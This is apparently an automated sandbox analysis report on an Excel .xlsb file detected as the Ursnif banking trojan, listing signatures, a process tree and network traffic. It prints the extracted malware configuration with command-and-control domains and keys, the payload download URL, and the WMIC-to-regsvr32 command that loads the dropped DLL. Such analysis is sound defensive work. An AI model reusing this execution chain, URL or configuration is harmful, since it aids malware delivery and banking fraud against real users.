Windows Analysis Report inquiry[2021.09.23_12-51].xlsb

Overview

General Information

Sample Name: inquiry[2021.09.23_12-51].xlsb
Analysis ID: 507191
MD5: d5dedf5221391bc183c80173ed5f4279
SHA1: bc48802d095a79a9fb8196d35506c4862c937936
SHA256: f2be1c567425b843b8deec064cd9f747d74f4ae5e15d026fcb5b26549ae3fba9

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Document exploit detected (drops PE files)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Sigma detected: Regsvr32 Anomaly
Writes or reads registry keys via WMI
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Drops PE files to the user root directory
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to create processes via WMI
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious WMI Execution
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Yara detected Xls With Macro 4.0
Registers a DLL
Drops PE files to the user directory
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1592 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 2032 cmdline: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll' MD5: FD902835DEAEF4091799287736F3A028)
  • regsvr32.exe (PID: 836 cmdline: regsvr32 -s C:\Users\Public\codec.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1836 cmdline: -s C:\Users\Public\codec.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "fvJh27FBcY4iDmo8nCK4tyEyXBN1k8EH6mQMtoi0dnoRhrc5m5vdusHgV3SXuoUGMa23szx8nbXoW/YvU6GtHhAvUSB3G4U1Ylw/Xh1SVuQ+LO6TJ5FDzvuvlg0YXcMX9mvaGnH4pn1OZPle0xacxTcEDOgypVqvi4iEgedhkhwkB6rnz9dTsvjARpuFSu5o8A6JPynuxJxchr9FkN/Fno9flLeQF+/qdSiPrlYIV9RsCbTSD+mr7xqZf1jQtWFzbzSlTV418QgPx2KC/w2jRtHZz8hTGrwmHwLbEbIJliSiQj5HSTV5xJYqQZZ7Zy9GbDv8RU+OXsPiONzK+XPKFqwVzJ1/d6Y0ElMnzCE6P84=", "c2_domain": ["apt.updateffboruse.com", "app.updatebrouser.com"], "botnet": "1500", "server": "580", "serpent_key": "H5PUPU7SQqXa0MEJ", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
Process Memory Space: regsvr32.exe PID: 1836 | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.regsvr32.exe.6e2a0000.8.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
6.2.regsvr32.exe.2a59590.7.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
6.3.regsvr32.exe.1c8cbc.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
6.2.regsvr32.exe.1a0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
6.2.regsvr32.exe.2a59590.7.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

                      Sigma Overview

                      System Summary:

                      Sigma detected: Regsvr32 Anomaly
                      Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: -s C:\Users\Public\codec.dll, CommandLine: -s C:\Users\Public\codec.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\Public\codec.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 836, ProcessCommandLine: -s C:\Users\Public\codec.dll, ProcessId: 1836
                      Sigma detected: Microsoft Office Product Spawning Windows Shell
                      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', CommandLine: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1592, ProcessCommandLine: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', ProcessId: 2032
                      Sigma detected: Suspicious WMI Execution
                      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', CommandLine: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1592, ProcessCommandLine: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll', ProcessId: 2032

                      Jbx Signature Overview

                      AV Detection:

                      Found malware configuration
                      Source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "fvJh27FBcY4iDmo8nCK4tyEyXBN1k8EH6mQMtoi0dnoRhrc5m5vdusHgV3SXuoUGMa23szx8nbXoW/YvU6GtHhAvUSB3G4U1Ylw/Xh1SVuQ+LO6TJ5FDzvuvlg0YXcMX9mvaGnH4pn1OZPle0xacxTcEDOgypVqvi4iEgedhkhwkB6rnz9dTsvjARpuFSu5o8A6JPynuxJxchr9FkN/Fno9flLeQF+/qdSiPrlYIV9RsCbTSD+mr7xqZf1jQtWFzbzSlTV418QgPx2KC/w2jRtHZz8hTGrwmHwLbEbIJliSiQj5HSTV5xJYqQZZ7Zy9GbDv8RU+OXsPiONzK+XPKFqwVzJ1/d6Y0ElMnzCE6P84=", "c2_domain": ["apt.updateffboruse.com", "app.updatebrouser.com"], "botnet": "1500", "server": "580", "serpent_key": "H5PUPU7SQqXa0MEJ", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for domain / URL
                      Source: iqwasithealth.comVirustotal: Detection: 6%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cmsMetadefender: Detection: 37%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cmsReversingLabs: Detection: 67%
                      Source: C:\Users\Public\codec.dllMetadefender: Detection: 37%Perma Link
                      Source: C:\Users\Public\codec.dllReversingLabs: Detection: 67%
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,6_2_001A3FAB
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 50.87.248.41:443 -> 192.168.2.22:49165 version: TLS 1.2
                      Source: Binary string: c:\885\Thus\Drop\Occur\159_take\King.pdb source: regsvr32.exe, 00000006.00000002.674612184.000000006E2CE000.00000002.00020000.sdmp, a435gfhs109[1].cms.0.dr
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2C77FF FindFirstFileExA,6_2_6E2C77FF

                      Software Vulnerabilities:

                      Document exploit detected (drops PE files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: codec.dll.0.drJump to dropped file
                      Document exploit detected (creates forbidden files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\codec.dllJump to behavior
                      Document exploit detected (process start blacklist hit)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
                      Document exploit detected (UrlDownloadToFile)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                      Source: global trafficDNS query: name: iqwasithealth.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 50.87.248.41:443

                      Networking:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: app.updatebrouser.com
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: apt.updateffboruse.com
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/a435gfhs109.cms HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: iqwasithealth.comConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                      Source: regsvr32.exe, 00000006.00000002.673589094.0000000000518000.00000004.00000020.sdmpString found in binary or memory: http://apt.updateffboruse.com/_2BYjuB36DkhB1eXLxT/icgzR9URog3BC5Xw8V6nIs/1N91Pgd5TeSwG/3boxgKnH/mcET
                      Source: regsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: WMIC.exe, 00000003.00000002.415850120.0000000001B60000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.673734417.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673666693.0000000001CC0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: regsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: sharedStrings.binString found in binary or memory: https://iqwasithealth.com/wp-content/uploads/2019/06/a435gfhs109.cms
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE192CE4.pngJump to behavior
                      Source: unknownDNS traffic detected: queries for: iqwasithealth.com
                      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/a435gfhs109.cms HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: iqwasithealth.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 50.87.248.41:443 -> 192.168.2.22:49165 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY

                      E-Banking Fraud:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,6_2_001A3FAB

                      System Summary:

                      Office process drops PE file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cmsJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\codec.dllJump to dropped file
                      Writes or reads registry keys via WMI
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
                      Contains functionality to create processes via WMI
                      Source: WMIC.exe, 00000003.00000002.415756597.00000000002E4000.00000004.00000040.sdmpBinary or memory string: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'MAIN=EIVQSAOUS
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A22746_2_6E2A2274
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A7E306_2_001A7E30
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A26546_2_001A2654
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A4FA76_2_001A4FA7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2CC8416_2_6E2CC841
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A121F NtMapViewOfSection,6_2_6E2A121F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A1A1C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,6_2_6E2A1A1C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A2013 GetProcAddress,NtCreateSection,memset,6_2_6E2A2013
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A2495 NtQueryVirtualMemory,6_2_6E2A2495
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,6_2_001A22EC
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A8055 NtQueryVirtualMemory,6_2_001A8055
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\codec.dll D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
                      Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                      Source: codec.dll.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: a435gfhs109[1].cms.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'
                      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\Public\codec.dll
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\Public\codec.dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\Public\codec.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$inquiry[2021.09.23_12-51].xlsbJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDBFC.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@6/4@4/1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A4D62 SetWaitableTimer,CoCreateInstance,CoSetProxyBlanket,6_2_001A4D62
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A11B8 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,6_2_001A11B8
                      Source: inquiry[2021.09.23_12-51].xlsbJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: inquiry[2021.09.23_12-51].xlsbInitial sample: OLE zip file path = xl/media/image1.png
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: c:\885\Thus\Drop\Occur\159_take\King.pdb source: regsvr32.exe, 00000006.00000002.674612184.000000006E2CE000.00000002.00020000.sdmp, a435gfhs109[1].cms.0.dr
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A2210 push ecx; ret 6_2_6E2A2219
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A2263 push ecx; ret 6_2_6E2A2273
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A7E1F push ecx; ret 6_2_001A7E2F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A7AB0 push ecx; ret 6_2_001A7AB9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2AF61D push ecx; ret 6_2_6E2AF622
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2AFE10 push 8B419BFFh; retf 6_2_6E2AFE34
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B024A push esp; retf 6_2_6E2B024C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B4291 push dword ptr [eax+eax-41h]; ret 6_2_6E2B429F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B2B4A push ss; ret 6_2_6E2B2B56
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2AF748 push dword ptr [ebp+ebp*2-0Ch]; ret 6_2_6E2AF7CF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B0B47 push ebp; retf 6_2_6E2B0B49
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B535F push edx; ret 6_2_6E2B536D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2AF817 push dword ptr [ebp+ebp*2-0Ch]; ret 6_2_6E2AF7CF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B2869 push edi; retf 6_2_6E2B2876
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B2073 push esi; ret 6_2_6E2B209D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2B209E push esi; ret 6_2_6E2B209D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2C3DE6 push ecx; ret 6_2_6E2C3DF9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2F9120 pushad ; iretd 6_2_6E2F914E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2FAF10 pushad ; ret 6_2_6E2FAF17
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2FA165 push cs; ret 6_2_6E2FA16D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2FAA50 push esp; iretd 6_2_6E2FAA51
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2FA0B9 push edi; iretd 6_2_6E2FA0BD
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A1552 LoadLibraryA,GetProcAddress,6_2_6E2A1552
                      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\Public\codec.dll

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cmsJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\codec.dllJump to dropped file

                      Boot Survival:

                      Drops PE files to the user root directory
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\codec.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
